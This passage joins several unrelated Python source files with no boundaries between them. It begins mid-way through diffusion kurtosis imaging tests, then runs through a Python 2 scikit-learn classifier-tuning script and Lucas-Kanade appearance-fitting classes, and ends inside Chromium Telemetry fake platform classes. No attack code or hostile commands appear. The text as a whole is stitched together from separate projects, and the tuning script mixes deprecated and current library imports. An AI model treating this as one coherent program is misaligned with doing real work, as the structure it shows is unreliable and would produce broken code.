        assert_array_almost_equal(np.var(s_noise - s), sigma ** 2, decimal=2)


def test_all_tensor_evecs():
    """all_tensor_evecs builds the expected frame from a principal axis."""
    principal = np.array([1/np.sqrt(2), 1/np.sqrt(2), 0])

    # Expected columns: the axis itself, its in-plane perpendicular, and z.
    expected = np.array([[1/np.sqrt(2), 1/np.sqrt(2), 0],
                         [-1/np.sqrt(2), 1/np.sqrt(2), 0],
                         [0, 0, 1]]).T

    assert_array_almost_equal(all_tensor_evecs(principal), expected)


def test_kurtosis_elements():
    """ Testing symmetry of the elements of the KT

    As an 4th order tensor, KT has 81 elements. However, due to diffusion
    symmetry the KT is fully characterized by 15 independent elements. This
    test checks for this property.
    """
    # two fiber not aligned to planes x = 0, y = 0, or z = 0
    mevals = np.array([[0.00099, 0, 0], [0.00226, 0.00087, 0.00087],
                       [0.00099, 0, 0], [0.00226, 0.00087, 0.00087]])
    angles = [(80, 10), (80, 10), (20, 30), (20, 30)]
    fie = 0.49  # intra axonal water fraction
    frac = [fie * 50, (1-fie) * 50, fie * 50, (1-fie) * 50]
    sticks = _check_directions(angles)
    # Rotate each compartment's eigenvalues into the frame of its stick
    # direction to obtain the per-compartment diffusion tensors.
    mD = np.zeros((len(frac), 3, 3))
    for i in range(len(frac)):
        R = all_tensor_evecs(sticks[i])
        mD[i] = np.dot(np.dot(R, np.diag(mevals[i])), R.T)

    # compute global DT as the fraction-weighted sum of compartment tensors
    D = np.zeros((3, 3))
    for i in range(len(frac)):
        D = D + frac[i]*mD[i]

    # compute voxel's MD (one third of the trace of D)
    MD = (D[0][0] + D[1][1] + D[2][2]) / 3

    # Reference dictionary with the 15 independent elements.
    # Note: the index product (i+1)*(j+1)*(k+1)*(l+1) is the same for two
    # index quadruples if and only if they are related by the KT's
    # symmetries, so this product can be used as the dictionary key.
    kt_ref = {1: kurtosis_element(mD, frac, 0, 0, 0, 0),
              16: kurtosis_element(mD, frac, 1, 1, 1, 1),
              81: kurtosis_element(mD, frac, 2, 2, 2, 2),
              2: kurtosis_element(mD, frac, 0, 0, 0, 1),
              3: kurtosis_element(mD, frac, 0, 0, 0, 2),
              8: kurtosis_element(mD, frac, 0, 1, 1, 1),
              24: kurtosis_element(mD, frac, 1, 1, 1, 2),
              27: kurtosis_element(mD, frac, 0, 2, 2, 2),
              54: kurtosis_element(mD, frac, 1, 2, 2, 2),
              4: kurtosis_element(mD, frac, 0, 0, 1, 1),
              9: kurtosis_element(mD, frac, 0, 0, 2, 2),
              36: kurtosis_element(mD, frac, 1, 1, 2, 2),
              6: kurtosis_element(mD, frac, 0, 0, 1, 2),
              12: kurtosis_element(mD, frac, 0, 1, 1, 2),
              18: kurtosis_element(mD, frac, 0, 1, 2, 2)}

    # Testing all 81 possible elements
    xyz = [0, 1, 2]
    for i in xyz:
        for j in xyz:
            for k in xyz:
                for l in xyz:
                    key = (i+1) * (j+1) * (k+1) * (l+1)
                    # The (i, k, j, l) ordering deliberately permutes j and k;
                    # by KT symmetry the element value must be unchanged.
                    assert_almost_equal(kurtosis_element(mD, frac, i, k, j, l),
                                        kt_ref[key])
                    # Testing optional function inputs (precomputed D and MD)
                    assert_almost_equal(kurtosis_element(mD, frac, i, k, j, l),
                                        kurtosis_element(mD, frac, i, k, j, l,
                                                         D, MD))


def test_DKI_simulations_aligned_fibers():
    """
    Testing DKI simulations when aligning the same fiber to different axis.

    If biological parameters don't change, kt[0] of a fiber aligned to axis x
    has to be equal to kt[1] of a fiber aligned to the axis y and equal to
    kt[2] of a fiber aligned to axis z. The same is applicable for dt
    """
    # Defining parameters based on Neto Henriques et al., 2015. NeuroImage 111
    mevals = np.array([[0.00099, 0, 0],               # Intra-cellular
                       [0.00226, 0.00087, 0.00087]])  # Extra-cellular
    frac = [49, 51]  # Compartment volume fraction
    # axis x
    angles = [(90, 0), (90, 0)]
    signal_fx, dt_fx, kt_fx = multi_tensor_dki(gtab_2s, mevals, angles=angles,
                                               fractions=frac)
    # axis y
    angles = [(90, 90), (90, 90)]
    signal_fy, dt_fy, kt_fy = multi_tensor_dki(gtab_2s, mevals, angles=angles,
                                               fractions=frac)
    # axis z
    angles = [(0, 0), (0, 0)]
    signal_fz, dt_fz, kt_fz = multi_tensor_dki(gtab_2s, mevals, angles=angles,
                                               fractions=frac)

    # Swapping the fiber axis must simply permute the axial KT elements.
    assert_array_equal([kt_fx[0], kt_fx[1], kt_fx[2]],
                       [kt_fy[1], kt_fy[0], kt_fy[2]])
    assert_array_equal([kt_fx[0], kt_fx[1], kt_fx[2]],
                       [kt_fz[2], kt_fz[0], kt_fz[1]])

    # Likewise for the diagonal DT elements (indices 0, 2, 5).
    assert_array_equal([dt_fx[0], dt_fx[2], dt_fx[5]],
                       [dt_fy[2], dt_fy[0], dt_fy[5]])
    assert_array_equal([dt_fx[0], dt_fx[2], dt_fx[5]],
                       [dt_fz[5], dt_fz[0], dt_fz[2]])

    # testing S signal along axis x, y and z
    bvals = np.array([0, 0, 0, 1000, 1000, 1000, 2000, 2000, 2000])
    bvecs = np.asarray([[1, 0, 0], [0, 1, 0], [0, 0, 1],
                        [1, 0, 0], [0, 1, 0], [0, 0, 1],
                        [1, 0, 0], [0, 1, 0], [0, 0, 1]])
    gtab_axis = gradient_table(bvals, bvecs)
    # axis x
    S_fx = DKI_signal(gtab_axis, dt_fx, kt_fx, S0=100)
    assert_array_almost_equal(S_fx[0:3], [100, 100, 100])  # test S for b=0
    # axis y
    S_fy = DKI_signal(gtab_axis, dt_fy, kt_fy, S0=100)
    assert_array_almost_equal(S_fy[0:3], [100, 100, 100])  # test S for b=0
    # axis z
    S_fz = DKI_signal(gtab_axis, dt_fz, kt_fz, S0=100)
    assert_array_almost_equal(S_fz[0:3], [100, 100, 100])  # test S for b=0

    # test S for b = 1000
    assert_array_almost_equal([S_fx[3], S_fx[4], S_fx[5]],
                              [S_fy[4], S_fy[3], S_fy[5]])
    assert_array_almost_equal([S_fx[3], S_fx[4], S_fx[5]],
                              [S_fz[5], S_fz[3], S_fz[4]])
    # test S for b = 2000
    assert_array_almost_equal([S_fx[6], S_fx[7], S_fx[8]],
                              [S_fy[7], S_fy[6], S_fy[8]])
    assert_array_almost_equal([S_fx[6], S_fx[7], S_fx[8]],
                              [S_fz[8], S_fz[6], S_fz[7]])


def test_DKI_crossing_fibers_simulations():
    """ Testing DKI simulations of a crossing fiber
    """
    # two fiber not aligned to planes x = 0, y = 0, or z = 0
    mevals = np.array([[0.00099, 0, 0], [0.00226, 0.00087, 0.00087],
                       [0.00099, 0, 0], [0.00226, 0.00087, 0.00087]])
    angles = [(80, 10), (80, 10), (20, 30), (20, 30)]
    fie = 0.49  # intra-axonal water fraction
    frac = [fie*50, (1 - fie)*50, fie*50, (1 - fie)*50]
    signal, dt, kt = multi_tensor_dki(gtab_2s, mevals, angles=angles,
                                      fractions=frac, snr=None)
    # in this simulations dt and kt cannot have zero elements
    for i in range(len(dt)):
        assert dt[i] != 0
    for i in range(len(kt)):
        assert kt[i] != 0

    # test S, dt and kt relative to the expected values computed from another
    # DKI package - UDKI (Neto Henriques et al., 2015)
    dt_ref = [1.0576161e-3, 0.1292542e-3, 0.4786179e-3,
              0.2667081e-3, 0.1136643e-3, 0.9888660e-3]
    kt_ref = [2.3529944, 0.8226448, 2.3011221, 0.2017312, -0.0437535,
              0.0404011, 0.0355281, 0.2449859, 0.2157668, 0.3495910,
              0.0413366, 0.3461519, -0.0537046, 0.0133414, -0.017441]
    assert_array_almost_equal(dt, dt_ref)
    assert_array_almost_equal(kt, kt_ref)
    # The signal itself must be reproducible from the reference dt/kt.
    assert_array_almost_equal(signal,
                              DKI_signal(gtab_2s, dt_ref, kt_ref, S0=100,
                                         snr=None),
                              decimal=5)


if __name__ == "__main__":

    # Run one representative simulation test when executed as a script.
    test_multi_tensor()

# License: BSD 3 clause <https://opensource.org/licenses/BSD-3-Clause>
# Copyright (c) 2016, Fabricio Vargas Matos <fabriciovargasmatos@gmail.com>
# All rights reserved.

'''
Tune the 3 most promising algorithms and compare them
'''

# Load libraries
import os
import time
import pandas
import numpy
import matplotlib.pyplot as plt
from pandas.tools.plotting import scatter_matrix
from pandas import DataFrame
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import MinMaxScaler
from sklearn import cross_validation
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.pipeline import Pipeline
from sklearn.grid_search import GridSearchCV
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.datasets import load_digits
from sklearn.model_selection import GridSearchCV
from sklearn.decomposition import PCA, NMF
from sklearn.feature_selection import SelectKBest, chi2

import lib.eda1 as eda1
import lib.eda3 as eda3


# Constants controlling the tuning runs.
N_DIGITS = 3  # zero-pad width for saved-image sequence numbers
NUM_FOLDS = 10  # folds for k-fold cross-validation
RAND_SEED = 7  # fixed seed so CV splits are reproducible
SCORING = 'accuracy'  # GridSearchCV scoring metric
VALIDATION_SIZE = 0.20  # hold-out fraction -- presumably used by eda1's split helper; confirm
N_JOBS = 6  # parallel workers for GridSearchCV

# Mutable module-level state shared by the tune* helpers below.
start = time.clock()  # wall-clock start time; reset again in run()
imageidx = 1  # sequence number of the next saved plot image
createImages = True  # when False, plot generation is skipped
results = []  # per-algorithm arrays of CV mean test scores
names = []  # algorithm names (intended to parallel `results`)
params = []  # tuned parameter sets
bestResults = []  # best {name, mean, std, params} per algorithm

# RandomForestClassifier
def tuneRF(X_train, Y_train, outputPath):
    global results, names, params, bestResults
    
    print 'tune LR (Random Forest Classifier)'
    
    pipeline = Pipeline([('PCA', PCA()),('MinMaxScaler', MinMaxScaler(feature_range=(0, 1))),('Scaler', StandardScaler())])
    scaler = pipeline.fit(X_train)
    rescaledX = scaler.transform(X_train)

    #tune para meters
    # http://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html
    #n_estimators_values = [5, 10, 100, 1000, 3000]
    n_estimators_values = [1000]
    max_features_values = [0.1, 'auto', 'sqrt', 'log2', None] # (float)0.1=>10%
    criterion_values = ['gini', 'entropy']
    
    param_grid = dict(n_estimators=n_estimators_values, max_features=max_features_values, criterion=criterion_values)
    
    model = RandomForestClassifier()
    
    kfold = cross_validation.KFold(n=len(X_train), n_folds=NUM_FOLDS, random_state=RAND_SEED)
    grid = GridSearchCV(n_jobs=N_JOBS, verbose=10, estimator=model, param_grid=param_grid, scoring=SCORING, cv=kfold)
    
    grid_result = grid.fit(rescaledX, Y_train)
    print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))    
        
    best_idx = grid_result.best_index_

    #TODO: check it out if 'mean_test_score' is really what I want here
    cv_results = grid_result.cv_results_['mean_test_score']
    results.append(cv_results)
    
    grid_scores = sorted(grid_result.grid_scores_, key=lambda x: x[2].mean(), reverse=True)
    first = True
    for param, mean_score, scores in grid_scores:
        if first:
            bestResults.append({'name':'RF', 'mean':scores.mean(), 'std':scores.std(), 'params':param})
            first = False
        print("%f (%f) with: %r" % (scores.mean(), scores.std(), param))

# ExtraTreesClassifier
def tuneET(X_train, Y_train, outputPath):
    """Grid-search an ExtraTreesClassifier and record its CV results.

    Appends the grid's mean test scores to the module-global `results`
    and the best score/std/params (tagged 'ET') to `bestResults`.
    outputPath is currently unused; kept so all tune* helpers share the
    same signature.
    """
    global results, names, params, bestResults

    print 'tune ET (Extra Trees Classifier)'

    # Shared preprocessing chain: PCA, min-max to [0, 1], then z-scoring.
    pipeline = Pipeline([('PCA', PCA()),('MinMaxScaler', MinMaxScaler(feature_range=(0, 1))),('Scaler', StandardScaler())])
    scaler = pipeline.fit(X_train)
    rescaledX = scaler.transform(X_train)

    # tune parameters
    # http://scikit-learn.org/stable/modules/generated/sklearn.ensemble.ExtraTreesClassifier.html
    #n_estimators_values = [5, 10, 100, 1000, 3000]
    n_estimators_values = [1000]
    max_features_values = [0.1, 'auto', 'sqrt', 'log2', None] # (float)0.1=>10%
    criterion_values = ['gini', 'entropy']

    param_grid = dict(n_estimators=n_estimators_values, max_features=max_features_values, criterion=criterion_values)

    model = ExtraTreesClassifier()

    kfold = cross_validation.KFold(n=len(X_train), n_folds=NUM_FOLDS, random_state=RAND_SEED)
    grid = GridSearchCV(n_jobs=N_JOBS, verbose=10, estimator=model, param_grid=param_grid, scoring=SCORING, cv=kfold)

    grid_result = grid.fit(rescaledX, Y_train)
    print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))

    best_idx = grid_result.best_index_  # NOTE(review): assigned but never used

    # TODO: confirm 'mean_test_score' is really the statistic wanted here
    cv_results = grid_result.cv_results_['mean_test_score']
    results.append(cv_results)

    # grid_scores_ entries are (params, mean, per-fold scores); best first.
    grid_scores = sorted(grid_result.grid_scores_, key=lambda x: x[2].mean(), reverse=True)
    first = True
    for param, mean_score, scores in grid_scores:
        if first:
            bestResults.append({'name':'ET', 'mean':scores.mean(), 'std':scores.std(), 'params':param})
            first = False
        print("%f (%f) with: %r" % (scores.mean(), scores.std(), param))
    
    
# Tune scaled SVM
def tuneSVM(X_train, Y_train, outputPath):
    """Grid-search an SVC over C and kernel and record its CV results.

    Appends the grid's mean test scores to the module-global `results`
    and the best score/std/params (tagged 'SVM') to `bestResults`.
    outputPath is currently unused; kept so all tune* helpers share the
    same signature.
    """
    global results, names, params, bestResults

    print 'tune SVM (Support Vector Machines Classifier)'

    # Shared preprocessing chain: PCA, min-max to [0, 1], then z-scoring.
    pipeline = Pipeline([('PCA', PCA()),('MinMaxScaler', MinMaxScaler(feature_range=(0, 1))),('Scaler', StandardScaler())])
    scaler = pipeline.fit(X_train)
    rescaledX = scaler.transform(X_train)

    #c_values = [0.1, 1.0, 100.0, 10000.0, 100000.0]
    c_values = [10000.0, 100000.0]
    kernel_values = ['linear', 'poly', 'rbf', 'sigmoid']
    param_grid = dict(C=c_values, kernel=kernel_values)

    model = SVC()

    kfold = cross_validation.KFold(n=len(X_train), n_folds=NUM_FOLDS, random_state=RAND_SEED)
    grid = GridSearchCV(n_jobs=N_JOBS, verbose=10, estimator=model, param_grid=param_grid, scoring=SCORING, cv=kfold)

    grid_result = grid.fit(rescaledX, Y_train)
    print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))

    best_idx = grid_result.best_index_  # NOTE(review): assigned but never used

    # TODO: confirm 'mean_test_score' is really the statistic wanted here
    cv_results = grid_result.cv_results_['mean_test_score']
    results.append(cv_results)

    # grid_scores_ entries are (params, mean, per-fold scores); best first.
    grid_scores = sorted(grid_result.grid_scores_, key=lambda x: x[2].mean(), reverse=True)
    first = True
    for param, mean_score, scores in grid_scores:
        if first:
            bestResults.append({'name':'SVM', 'mean':scores.mean(), 'std':scores.std(), 'params':param})
            first = False
        print("%f (%f) with: %r" % (scores.mean(), scores.std(), param))
        
        
def drawTunedAlgorithmsComparison(results, names, outputPath):
    """Print the best tuned result per algorithm and, if image creation is
    enabled, save a box plot comparing the algorithms' CV score spreads.
    Increments the module-global image counter when a plot is saved.
    """
    global imageidx
    print '\n === Tuned Algorithms Comparison ===\n'

    #print bestResults
    for x in bestResults:
        print x

    # Compare Algorithms
    if (createImages):
        fig = plt.figure()
        fig.suptitle('Final Tuned-Algorithms Comparison')
        ax = fig.add_subplot(111)
        plt.boxplot(results)
        ax.set_xticklabels(names)
        #plt.show()
        plt.savefig(outputPath + str(imageidx).zfill(N_DIGITS) + '-Tuned-Algorithm-Comparison.png')
        imageidx += 1

    # Release all figures even when no image was created.
    plt.close('all')
        
        
def set_createImages(value):
    """Set the module-level flag that enables or disables plot generation."""
    global createImages
    createImages = value
    
        
# ===================================================
# ================== main function ==================
# ===================================================
def run(inputFilePath, outputPath, createImagesFlag, dropColumns):
    """Run EDA #4: load the dataset, split it, tune the selected
    algorithm(s), and plot a comparison of the tuned results.

    inputFilePath: CSV/dataset path handed to eda1.loadDataframe.
    outputPath: directory for generated images; created if missing.
    createImagesFlag: forwarded to set_createImages / eda1.
    dropColumns: columns removed during eda1.dataCleansing.
    """
    global start

    print '####################################################################'
    print '############### Running Exploratory Data Analysis #4 ###############'
    print '####################################################################'
    print ''

    set_createImages(createImagesFlag)
    start = time.clock()
    eda1.reset_imageidx()
    eda1.set_createImages(createImagesFlag)

    if not os.path.exists(outputPath):
        os.makedirs(outputPath)    

    # Load dataset
    dataframe = eda1.loadDataframe(inputFilePath)

    # drop out 'not fair' features
    dataframe = eda1.dataCleansing(dataframe, dropColumns)

    #Split-out train/validation dataset
    X_train, X_validation, Y_train, Y_validation = eda1.splitoutValidationDataset(dataframe)    

    '''
    # tune each algorithm
    try:
        tuneRF(X_train, Y_train, outputPath)
    except Exception as e:
        print "ERROR: couldn't tune RF"
        print "Message: %s" % str(e)
        
    try:
        tuneET(X_train, Y_train, outputPath)
    except Exception as e:
        print "ERROR: couldn't tune ET"
        print "Message: %s" % str(e)
    '''  

    # Only SVM is currently tuned; RF/ET are disabled in the block above.
    try:
        tuneSVM(X_train, Y_train, outputPath)
    except Exception as e:
        print "ERROR: couldn't tune SVM"
        print "Message: %s" % str(e)

    #print the results comparing the algorithms with the best tune for each one
    drawTunedAlgorithmsComparison(results, names, outputPath)

    # NOTE(review): 'THEN END' below looks like a typo for 'THE END' -- it is
    # a runtime string, so it is left untouched here.
    print '\n<<< THEN END - Running Exploratory Data Analysis #4 >>>'

    #RF - Best: 0.853451 using {'max_features': 'log2', 'n_estimators': 1000, 'criterion': 'gini'}
    #ET - Best: 0.855320 using {'max_features': None, 'n_estimators': 1000, 'criterion': 'gini'}
import numpy as np
from scipy.linalg import norm

from .base import AppearanceLucasKanade


class SimultaneousForwardAdditive(AppearanceLucasKanade):
    r"""Simultaneous Forward Additive Lucas-Kanade fitter: shape parameters
    and appearance weights are updated jointly each iteration, with the
    warp update applied additively.
    """

    @property
    def algorithm(self):
        # Short identifier used for reporting.
        return 'Simultaneous-FA'

    def _fit(self, lk_fitting, max_iters=20, project=True):
        """Fit the model to ``lk_fitting.image``.

        Parameters
        ----------
        lk_fitting : fitting-result object whose ``parameters`` and
            ``weights`` histories are appended to in place.
        max_iters : int, maximum number of update iterations.
        project : bool, if True initialise appearance weights by projecting
            the warped image onto the appearance model; otherwise start
            from zeros (the model mean).

        Returns the same ``lk_fitting`` with ``fitted`` set to True.
        """
        # Initial error > eps so the loop runs at least once
        error = self.eps + 1
        image = lk_fitting.image
        lk_fitting.weights = []
        n_iters = 0

        # Number of shape (warp) parameters
        n_params = self.transform.n_parameters

        # Initial appearance weights
        if project:
            # Obtain weights by projecting the warped image
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)
            weights = self.appearance_model.project(IWxp)
            # Reset template
            self.template = self.appearance_model.instance(weights)
        else:
            # Set all weights to 0 (yielding the mean)
            weights = np.zeros(self.appearance_model.n_active_components)

        lk_fitting.weights.append(weights)

        # Compute appearance model Jacobian wrt weights
        appearance_jacobian = self.appearance_model._jacobian.T

        # Forward Additive Algorithm
        while n_iters < max_iters and error > self.eps:
            # Compute warped image with current weights
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)

            # Compute warp Jacobian
            dW_dp = self.transform.jacobian(
                self.template.mask.true_indices)

            # Compute steepest descent images, VI_dW_dp
            J = self.residual.steepest_descent_images(
                image, dW_dp, forward=(self.template, self.transform,
                                       self.interpolator))

            # Concatenate VI_dW_dp with appearance model Jacobian
            self._J = np.hstack((J, appearance_jacobian))

            # Compute Hessian and inverse
            self._H = self.residual.calculate_hessian(self._J)

            # Compute steepest descent parameter updates
            sd_delta_p = self.residual.steepest_descent_update(
                self._J, self.template, IWxp)

            # Compute gradient descent parameter updates
            delta_p = np.real(self._calculate_delta_p(sd_delta_p))

            # Update warp weights
            parameters = self.transform.as_vector() + delta_p[:n_params]
            self.transform.from_vector_inplace(parameters)
            lk_fitting.parameters.append(parameters)

            # Update appearance weights.  BUG FIX: use an out-of-place
            # subtraction -- the previous in-place `weights -= ...` mutated
            # the ndarray already stored in lk_fitting.weights, so every
            # recorded entry aliased the same (final) vector.
            weights = weights - delta_p[n_params:]
            self.template = self.appearance_model.instance(weights)
            lk_fitting.weights.append(weights)

            # Test convergence
            error = np.abs(norm(delta_p))
            n_iters += 1

        lk_fitting.fitted = True
        return lk_fitting


class SimultaneousForwardCompositional(AppearanceLucasKanade):
    r"""Simultaneous Forward Compositional Lucas-Kanade fitter: shape and
    appearance are updated jointly, with the warp update composed after
    the current transform.
    """

    @property
    def algorithm(self):
        # Short identifier used for reporting.
        return 'Simultaneous-FC'

    def _set_up(self):
        # The warp Jacobian is constant in the compositional formulation,
        # so precompute it once.
        self._dW_dp = self.transform.jacobian(
            self.template.mask.true_indices)

    def _fit(self, lk_fitting, max_iters=20, project=True):
        """Fit the model to ``lk_fitting.image``.

        Parameters
        ----------
        lk_fitting : fitting-result object whose ``parameters`` and
            ``weights`` histories are appended to in place.
        max_iters : int, maximum number of update iterations.
        project : bool, if True initialise appearance weights by projecting
            the warped image onto the appearance model; otherwise start
            from zeros (the model mean).

        Returns the same ``lk_fitting`` with ``fitted`` set to True.
        """
        # Initial error > eps so the loop runs at least once
        error = self.eps + 1
        image = lk_fitting.image
        lk_fitting.weights = []
        n_iters = 0

        # Number of shape (warp) parameters
        n_params = self.transform.n_parameters

        # Initial appearance weights
        if project:
            # Obtain weights by projecting the warped image
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)
            weights = self.appearance_model.project(IWxp)
            # Reset template
            self.template = self.appearance_model.instance(weights)
        else:
            # Set all weights to 0 (yielding the mean)
            weights = np.zeros(self.appearance_model.n_active_components)

        lk_fitting.weights.append(weights)

        # Compute appearance model Jacobian wrt weights
        appearance_jacobian = self.appearance_model._jacobian.T

        # Forward Compositional Algorithm
        # (comment fixed: this is the compositional, not additive, variant)
        while n_iters < max_iters and error > self.eps:
            # Compute warped image with current weights
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)

            # Compute steepest descent images, VI_dW_dp
            J = self.residual.steepest_descent_images(IWxp, self._dW_dp)

            # Concatenate VI_dW_dp with appearance model Jacobian
            self._J = np.hstack((J, appearance_jacobian))

            # Compute Hessian and inverse
            self._H = self.residual.calculate_hessian(self._J)

            # Compute steepest descent parameter updates
            sd_delta_p = self.residual.steepest_descent_update(
                self._J, self.template, IWxp)

            # Compute gradient descent parameter updates
            delta_p = np.real(self._calculate_delta_p(sd_delta_p))

            # Update warp weights by composing the incremental warp
            self.transform.compose_after_from_vector_inplace(delta_p[:n_params])
            lk_fitting.parameters.append(self.transform.as_vector())

            # Update appearance weights.  BUG FIX: out-of-place subtraction;
            # the previous in-place `weights -= ...` made every entry stored
            # in lk_fitting.weights alias the same (final) vector.
            weights = weights - delta_p[n_params:]
            self.template = self.appearance_model.instance(weights)
            lk_fitting.weights.append(weights)

            # Test convergence
            error = np.abs(norm(delta_p))
            n_iters += 1

        lk_fitting.fitted = True
        return lk_fitting


class SimultaneousInverseCompositional(AppearanceLucasKanade):
    r"""Simultaneous Inverse Compositional Lucas-Kanade fitter: the roles of
    image and template are swapped in the steepest-descent computation and
    the (negated) update is composed after the current transform.
    """

    @property
    def algorithm(self):
        # Short identifier used for reporting.
        return 'Simultaneous-IA'

    def _set_up(self):
        # The warp Jacobian is computed on the model mean's mask and is
        # constant, so precompute it once.
        self._dW_dp = self.transform.jacobian(
            self.appearance_model.mean.mask.true_indices)

    def _fit(self, lk_fitting, max_iters=20, project=True):
        """Fit the model to ``lk_fitting.image``.

        Parameters
        ----------
        lk_fitting : fitting-result object whose ``parameters`` and
            ``weights`` histories are appended to in place.
        max_iters : int, maximum number of update iterations.
        project : bool, if True initialise appearance weights by projecting
            the warped image onto the appearance model; otherwise start
            from zeros (the model mean).

        Returns the same ``lk_fitting`` with ``fitted`` set to True.
        """
        # Initial error > eps so the loop runs at least once
        error = self.eps + 1
        image = lk_fitting.image
        lk_fitting.weights = []
        n_iters = 0

        # Number of shape (warp) parameters
        n_params = self.transform.n_parameters

        # Initial appearance weights
        if project:
            # Obtain weights by projecting the warped image
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)
            weights = self.appearance_model.project(IWxp)
            # Reset template
            self.template = self.appearance_model.instance(weights)
        else:
            # Set all weights to 0 (yielding the mean)
            weights = np.zeros(self.appearance_model.n_active_components)

        lk_fitting.weights.append(weights)

        # Compute appearance model Jacobian wrt weights (negated for the
        # inverse formulation)
        appearance_jacobian = -self.appearance_model._jacobian.T

        # Baker-Matthews, Inverse Compositional Algorithm
        while n_iters < max_iters and error > self.eps:
            # Compute warped image with current weights
            IWxp = image.warp_to(self.template.mask, self.transform,
                                 interpolator=self.interpolator)

            # Compute steepest descent images, VT_dW_dp (template gradient)
            J = self.residual.steepest_descent_images(self.template,
                                                      self._dW_dp)

            # Concatenate VI_dW_dp with appearance model Jacobian
            self._J = np.hstack((J, appearance_jacobian))

            # Compute Hessian and inverse
            self._H = self.residual.calculate_hessian(self._J)

            # Compute steepest descent parameter updates (image and template
            # swapped relative to the forward algorithms)
            sd_delta_p = self.residual.steepest_descent_update(
                self._J, IWxp, self.template)

            # Compute gradient descent parameter updates (negated: the
            # inverse update is inverted before composition)
            delta_p = -np.real(self._calculate_delta_p(sd_delta_p))

            # Update warp weights by composing the incremental warp
            self.transform.compose_after_from_vector_inplace(delta_p[:n_params])
            lk_fitting.parameters.append(self.transform.as_vector())

            # Update appearance weights.  BUG FIX: out-of-place subtraction;
            # the previous in-place `weights -= ...` made every entry stored
            # in lk_fitting.weights alias the same (final) vector.
            weights = weights - delta_p[n_params:]
            self.template = self.appearance_model.instance(weights)
            lk_fitting.weights.append(weights)

            # Test convergence
            error = np.abs(norm(delta_p))
            n_iters += 1

        lk_fitting.fitted = True
        return lk_fitting

# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Provides fakes for several of Telemetry's internal objects.

These allow code like story_runner and Benchmark to be run and tested
without compiling or starting a browser. Class names prepended with an
underscore are intended to be implementation details, and should not
be subclassed; however, some, like _FakeBrowser, have public APIs that
may need to be called in tests.
"""
from telemetry.internal.backends.chrome_inspector import websocket
from telemetry.internal.browser import browser_options
from telemetry.internal.platform import system_info
from telemetry.page import shared_page_state
from telemetry.util import image_util
from telemetry.testing.internal import fake_gpu_info
from types import ModuleType


# Classes and functions which are intended to be part of the public
# fakes API.

class FakePlatform(object):
  """Fake of Telemetry's Platform with settable OS and device attributes."""

  def __init__(self):
    self._network_controller = None
    self._tracing_controller = None
    self._has_battor = False
    self._os_name = 'FakeOS'
    self._device_type_name = 'abc'
    self._is_svelte = False
    self._is_aosp = True

  @property
  def is_host_platform(self):
    raise NotImplementedError

  @property
  def network_controller(self):
    # Lazily constructed on first access.
    if self._network_controller is None:
      self._network_controller = _FakeNetworkController()
    return self._network_controller

  @property
  def tracing_controller(self):
    # Lazily constructed on first access.
    if self._tracing_controller is None:
      self._tracing_controller = _FakeTracingController()
    return self._tracing_controller

  def Initialize(self):
    pass

  def StopAllLocalServers(self):
    pass

  def WaitForBatteryTemperature(self, _):
    pass

  # Thermal-throttling queries: the fake never throttles.
  def CanMonitorThermalThrottling(self):
    return False

  def IsThermallyThrottled(self):
    return False

  def HasBeenThermallyThrottled(self):
    return False

  def GetArchName(self):
    raise NotImplementedError

  def GetOSVersionName(self):
    raise NotImplementedError

  def GetOSVersionDetailString(self):
    raise NotImplementedError

  def SetOSName(self, name):
    self._os_name = name

  def GetOSName(self):
    return self._os_name

  def HasBattOrConnected(self):
    return self._has_battor

  def SetBattOrDetected(self, b):
    assert isinstance(b, bool)
    self._has_battor = b

  # TODO(rnephew): Investigate moving from setters to @property.
  def SetDeviceTypeName(self, name):
    self._device_type_name = name

  def GetDeviceTypeName(self):
    return self._device_type_name

  def SetIsSvelte(self, b):
    assert isinstance(b, bool)
    self._is_svelte = b

  def IsSvelte(self):
    # Svelte is an Android-only concept; other OS names raise.
    if self._os_name != 'android':
      raise NotImplementedError
    return self._is_svelte

  def SetIsAosp(self, b):
    assert isinstance(b, bool)
    self._is_aosp = b

  def IsAosp(self):
    return self._is_aosp and self._os_name == 'android'

class FakeLinuxPlatform(FakePlatform):
  """FakePlatform flavoured as a desktop Linux host."""

  def __init__(self):
    super(FakeLinuxPlatform, self).__init__()
    # Base64-encoded PNG; setting it enables CanTakeScreenshot below.
    self.screenshot_png_data = None
    # Paths registered via SetHTTPServerDirectories.
    self.http_server_directories = []
    self.http_server = FakeHTTPServer()

  @property
  def is_host_platform(self):
    return True

  def GetDeviceTypeName(self):
    return 'Desktop'

  def GetArchName(self):
    return 'x86_64'

  def GetOSName(self):
    return 'linux'

  def GetOSVersionName(self):
    return 'trusty'

  def GetOSVersionDetailString(self):
    return ''

  def CanTakeScreenshot(self):
    # Screenshots are only possible when fake PNG data was provided.
    return bool(self.screenshot_png_data)

  def TakeScreenshot(self, file_path):
    """Decode the canned PNG data and write it to file_path."""
    if not self.CanTakeScreenshot():
      raise NotImplementedError
    img = image_util.FromBase64Png(self.screenshot_png_data)
    image_util.WritePngFile(img, file_path)
    return True

  def SetHTTPServerDirectories(self, paths):
    # NOTE(review): appends `paths` as a single element (possibly a list),
    # it does not extend -- presumably intentional; confirm with callers.
    self.http_server_directories.append(paths)


class FakeHTTPServer(object):
